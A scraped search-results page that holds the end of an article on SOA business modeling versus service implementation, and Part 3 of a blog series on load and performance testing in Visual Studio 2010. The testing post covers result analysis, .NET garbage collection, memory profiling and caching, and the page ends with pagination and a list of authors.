in the same situation as company B, with wild services. If company B focuses on modeling, they could easily end up with the same problems as company A. Now we have two companies, who a short while ago had one problem each, that now have two problems each. This has happened because of a focus on ‘Succeeding with SOA’, rather than solving the problem at hand. This is not to suggest that the two problem domains are unrelated, a strategy that encompasses both will obviously be good for the organization. But only if the organization realizes this and can develop such a strategy. This strategy cannot be bought in a box. Anyone who has worked with SOA for a while will be used to analyzing the solutions to a problem and judging the solution’s level of coupling. If we have two applications that each perform separate functions, but need to communicate with each other, we create a integration layer between them, perhaps with a service, but we do all we can to reduce the dependency between the two systems. Using the same approach, we can separate the modeling (business architecture) and the service hosting (technical architecture). The business architecture describes the processes and business objects in the business domain. The technical architecture describes the hosting and management and implementation of services. The glue that binds these together, the integration layer in our analogy, is the service contract, where the operations map the processes to their technical implementation, and the messages map business concepts to software objects in the implementation. If we reduce the coupling between these layers, we should be able to allow developers to develop services, and business analysts to develop models, without the changes rippling through from one side to the other. This would allow company A to carry on modeling, and company B to develop a service platform, each achieving their intended goal, without necessarily creating the problems seen in pure top down or bottom up approaches. Company B could then at a later date map their service infrastructure to a unified model, and company A could carry on modeling, insulating deployed services from changes in the ongoing modeling. How do we do this? The concept of service virtualization has been around for a while, and is instantly realizable in Microsoft’s Managed Services Engine. Here we can create a layer of virtual services, which represent the business analyst’s view, presenting uniform contracts to the outside world. These services can then transform and route messages to the actual service implementations. I like to think of the virtual services with their beautifully modeled interfaces as ‘SOA services’, and the implementations as simple integration ‘adapter’ services providing an interface to a technical implementation. The Managed Services Engine also provides policy based control over services, regardless of where they are deployed, simplifying handling of security, logging, exception handling etc. This solves a big problem. The pressure to deliver services quickly is always there in projects. It is very important to quickly show value when implementing service architectures. There is also pressure to deliver quality, and you can’t easily do both at the same time. This approach allows quick delivery with quality increasing over time, allowing modeling and service development to occur in parallel and independent of each other. The link between business modeling and service implementation is not one that is obvious to many organizations, and requires a certain maturity to realize and drive forward. It is also completely possible that a company can benefit from one without the other, even if this approach is frowned upon today, there are many companies doing so and seeing ROI. Of course there are disadvantages to this. The biggest one being the transformations necessary between the virtual interfaces and the service implementations. Bad choices in developing the services in the service implementation could mean that it is impossible to map the modeled processes to the implementation with redevelopment of the service. In many cases the architect will not have a choice here anyway, as proprietary systems are often delivered with predeveloped services. The alternative is to wait until the model is finished and then build the service according the model. However, if that approach worked we wouldn’t be having this discussion! And even when it does work, natural business evolution will mean that the two concepts (model and implementation) will immediately start to drift away from each other, so coupling them tightly together so that they are forever bound to the model that only applies at the time of the modeling work will not really achieve a great deal. Architecture is all about trade offs, and here a choice has to be made. The choice is between something will initially be of low quality but will work, or something that may well be impossible to achieve in most situations. In conclusion, top-down is a natural approach for business analysts, and bottom-up is a natural approach for developers. Instead of trying to force something on both that neither want, and which has not shown itself to be successful, why not let them get on with their jobs, and let an enterprise architect coordinate the processes?

Read the article
Load and Web Performance Testing using Visual Studio Ultimate 2010-Part 3

- by Tarun Arora

Welcome back once again, in Part 1 of Load and Web Performance Testing using Visual Studio 2010 I talked about why Performance Testing the application is important, the test tools available in Visual Studio Ultimate 2010 and various test rig topologies, in Part 2 of Load and Web Performance Testing using Visual Studio 2010 I discussed the details of web performance & load tests as well as why it’s important to follow a goal based pattern while performance testing your application. In part 3 I’ll be discussing Test Result Analysis, Test Result Drill through, Test Report Generation, Test Run Comparison, Asp.net Profiler and some closing thoughts. Test Results – I see some creepy worms! In Part 2 we put together a web performance test and a load test, lets run the test to see load test to see how the Web site responds to the load simulation. While the load test is running you will be able to see close to real time analysis in the Load Test Analyser window. You can use the Load Test Analyser to conduct load test analysis in three ways: Monitor a running load test - A condensed set of the performance counter data is maintained in memory. To prevent the results memory requirements from growing unbounded, up to 200 samples for each performance counter are maintained. This includes 100 evenly spaced samples that span the current elapsed time of the run and the most recent 100 samples. After the load test run is completed - The test controller spools all collected performance counter data to a database while the test is running. Additional data, such as timing details and error details, is loaded into the database when the test completes. The performance data for a completed test is loaded from the database and analysed by the Load Test Analyser. Below you can see a screen shot of the summary view, this provides key results in a format that is compact and easy to read. You can also print the load test summary, this is generated after the test has completed or been stopped. Analyse the load test results of a previously run load test – We’ll see this in the section where i discuss comparison between two test runs. The performance counters can be plotted on the graphs. You also have the option to highlight a selected part of the test and view details, drill down to the user activity chart where you can hover over to see more details of the test run. Generate Report => Test Run Comparisons The level of reports you can generate using the Load Test Analyser is astonishing. You have the option to create excel reports and conduct side by side analysis of two test results or to track trend analysis. The tools also allows you to export the graph data either to MS Excel or to a CSV file. You can view the ASP.NET profiler report to conduct further analysis as well. View Data and Diagnostic Attachments opens the Choose Diagnostic Data Adapter Attachment dialog box to select an adapter to analyse the result type. For example, you can select an IntelliTrace adapter, click OK and open the IntelliTrace summary for the test agent that was used in the load test. Compare results This creates a set of reports that compares the data from two load test results using tables and bar charts. I have taken these screen shots from the MSDN documentation, I would highly recommend exploring the wealth of knowledge available on MSDN. Leaving Thoughts While load testing the application with an excessive load for a longer duration of time, i managed to bring the IIS to its knees by piling up a huge queue of requests waiting to be processed. This clearly means that the IIS had run out of threads as all the threads were busy processing existing request, one easy way of fixing this is by increasing the default number of allocated threads, but this might escalate the problem. The better suggestion is to try and drill down to the actual root cause of the problem. When ever the garbage collection runs it stops processing any pages so all requests that come in during that period are queued up, but realistically the garbage collection completes in fraction of a a second. To understand this better lets look at the .net heap, it is divided into large heap and small heap, anything greater than 85kB in size will be allocated to the Large object heap, the Large object heap is non compacting and remember large objects are expensive to move around, so if you are allocating something in the large object heap, make sure that you really need it! The small object heap on the other hand is divided into generations, so all objects that are supposed to be short-lived are suppose to live in Gen-0 and the long living objects eventually move to Gen-2 as garbage collection goes through. As you can see in the picture below all < 85 KB size objects are first assigned to Gen-0, when Gen-0 fills up and a new object comes in and finds Gen-0 full, the garbage collection process is started, the process checks for all the dead objects and assigns them as the valid candidate for deletion to free up memory and promotes all the remaining objects in Gen-0 to Gen-1. So in the future when ever you clean up Gen-1 you have to clean up Gen-0 as well. When you fill up Gen – 0 again, all of Gen – 1 dead objects are drenched and rest are moved to Gen-2 and Gen-0 objects are moved to Gen-1 to free up Gen-0, but by this time your Garbage collection process has started to take much more time than it usually takes. Now as I mentioned earlier when garbage collection is being run all page requests that come in during that period are queued up. Does this explain why possibly page requests are getting queued up, apart from this it could also be the case that you are waiting for a long running database process to complete. Lets explore the heap a bit more… What is really a case of crisis is when the objects are living long enough to make it to Gen-2 and then dying, this is definitely a high cost operation. But sometimes you need objects in memory, for example when you cache data you hold on to the objects because you need to use them right across the user session, which is acceptable. But if you wanted to see what extreme caching can do to your server then write a simple application that chucks in a lot of data in cache, run a load test over it for about 10-15 minutes, forcing a lot of data in memory causing the heap to run out of memory. If you get to such a state where you start running out of memory the IIS as a mode of recovery restarts the worker process. It is great way to free up all your memory in the heap but this would clear the cache. The problem with this is if the customer had 10 items in their shopping basket and that data was stored in the application cache, the user basket will now be empty forcing them either to get frustrated and go to a competitor website or if the customer is really patient, give it another try! How can you address this, well two ways of addressing this; 1. Workaround – A x86 bit processor only allows a maximum of 4GB of RAM, this means the machine effectively has around 3.4 GB of RAM available, the OS needs about 1.5 GB of RAM to run efficiently, the IIS and .net framework also need their share of memory, leaving you a heap of around 800 MB to play with. Because Team builds by default build your application in ‘Compile as any mode’ it means the application is build such that it will run in x86 bit mode if run on a x86 bit processor and run in a x64 bit mode if run on a x64 but processor. The problem with this is not all applications are really x64 bit compatible specially if you are using com objects or external libraries. So, as a quick win if you compiled your application in x86 bit mode by changing the compile as any selection to compile as x86 in the team build, you will be able to run your application on a x64 bit machine in x86 bit mode (WOW – By running Windows on Windows) and what that means is, you could use 8GB+ worth of RAM, if you take away everything else your application will roughly get a heap size of at least 4 GB to play with, which is immense. If you need a heap size of more than 4 GB you have either build a software for NASA or there is something fundamentally wrong in your application. 2. Solution – Now that you have put a workaround in place the IIS will not restart the worker process that regularly, which means you can take a breather and start working to get to the root cause of this memory leak. But this begs a question “How do I Identify possible memory leaks in my application?” Well i won’t say that there is one single tool that can tell you where the memory leak is, but trust me, ‘Performance Profiling’ is a great start point, it definitely gets you started in the right direction, let’s have a look at how. Performance Wizard - Start the Performance Wizard and select Instrumentation, this lets you measure function call counts and timings. Before running the performance session right click the performance session settings and chose properties from the context menu to bring up the Performance session properties page and as shown in the screen shot below, check the check boxes in the group ‘.NET memory profiling collection’ namely ‘Collect .NET object allocation information’ and ‘Also collect the .NET Object lifetime information’. Now if you fire off the profiling session on your pages you will notice that the results allows you to view ‘Object Lifetime’ which shows you the number of objects that made it to Gen-0, Gen-1, Gen-2, Large heap, etc. Another great feature about the profile is that if your application has > 5% cases where objects die right after making to the Gen-2 storage a threshold alert is generated to alert you. Since you have the option to also view the most expensive methods and by capturing the IntelliTrace data you can drill in to narrow down to the line of code that is the root cause of the problem. Well now that we have seen how crucial memory management is and how easy Visual Studio Ultimate 2010 makes it for us to identify and reproduce the problem with the best of breed tools in the product. Caching One of the main ways to improve performance is Caching. Which basically means you tell the web server that instead of going to the database for each request you keep the data in the webserver and when the user asks for it you serve it from the webserver itself. BUT that can have consequences! Let’s look at some code, trust me caching code is not very intuitive, I define a cache key for almost all searches made through the common search page and cache the results. The approach works fine, first time i get the data from the database and second time data is served from the cache, significant performance improvement, EXCEPT when two users try to do the same operation and run into each other. But it is easy to handle this by adding the lock as you can see in the snippet below. So, as long as a user comes in and finds that the cache is empty, the user locks and starts to get the cache no more concurrency issues. But lets say you are processing 10 requests per second, by the time i have locked the operation to get the results from the database, 9 other users came in and found that the cache key is null so after i have come out and populated the cache they will still go in to get the results again. The application will still be faster because the next set of 10 users and so on would continue to get data from the cache. BUT if we added another null check after locking to build the cache and before actual call to the db then the 9 users who follow me would not make the extra trip to the database at all and that would really increase the performance, but didn’t i say that the code won’t be very intuitive, may be you should leave a comment you don’t want another developer to come in and think what a fresher why is he checking for the cache key null twice !!! The downside of caching is, you are storing the data outside of the database and the data could be wrong because the updates applied to the database would make the data cached at the web server out of sync. So, how do you invalidate the cache? Well if you only had one way of updating the data lets say only one entry point to the data update you can write some logic to say that every time new data is entered set the cache object to null. But this approach will not work as soon as you have several ways of feeding data to the system or your system is scaled out across a farm of web servers. The perfect solution to this is Micro Caching which means you cache the query for a set time duration and invalidate the cache after that set duration. The advantage is every time the user queries for that data with in the time span for which you have cached the results there are no calls made to the database and the data is served right from the server which makes the response immensely quick. Now figuring out the appropriate time span for which you micro cache the query results really depends on the application. Lets say your website gets 10 requests per second, if you retain the cache results for even 1 minute you will have immense performance gains. You would reduce 90% hits to the database for searching. Ever wondered why when you go to e-bookers.com or xpedia.com or yatra.com to book a flight and you click on the book button because the fare seems too exciting and you get an error message telling you that the fare is not valid any more. Yes, exactly => That is a cache failure! These travel sites or price compare engines are not going to hit the database every time you hit the compare button instead the results will be served from the cache, because the query results are micro cached, its a perfect trade-off, by micro caching the results the site gains 100% performance benefits but every once in a while annoys a customer because the fare has expired. But the trade off works in the favour of these sites as they are still able to process up to 30+ page requests per second which means cater to the site traffic by may be losing 1 customer every once in a while to a competitor who is also using a similar caching technique what are the odds that the user will not come back to their site sooner or later? Recap Resources Below are some Key resource you might like to review. I would highly recommend the documentation, walkthroughs and videos available on MSDN. You can always make use of Fiddler to debug Web Performance Tests. Some community test extensions and plug ins available on Codeplex might also be of interest to you. The Road Ahead Thank you for taking the time out and reading this blog post, you may also want to read Part I and Part II if you haven’t so far. If you enjoyed the post, remember to subscribe to http://feeds.feedburner.com/TarunArora. Questions/Feedback/Suggestions, etc please leave a comment. Next ‘Load Testing in the cloud’, I’ll be working on exploring the possibilities of running Test controller/Agents in the Cloud. See you on the other side! Thank You! Share this post : CodeProject

Read the article

Search Results

Search found 464 results on 19 pages for 'the consequences of cheat'.

Page 18/19 | < Previous Page | 14 15 16 17 18 19 | Next Page >

- by Alois Kraus

- by LostInWPF

- by Ranhiru

- by andufo

- by Karan

- by Alois Kraus

- by Kevin Yang

- by danx

- by Fatherjack

- by Alexandra Georgescu

- by Chris Gardner

- by Erik Jensen

- by HostileFork

- by Toine Lille

- by ivankolo

- by TheGazzardian

- by Reed

- by Paul White NZ

- by Kerrie Foy

- by Antony Reynolds

- by ScottGu

- by Mladen Prajdic

- by barryoreilly

- by Tarun Arora

< Previous Page | 14 15 16 17 18 19 | Next Page >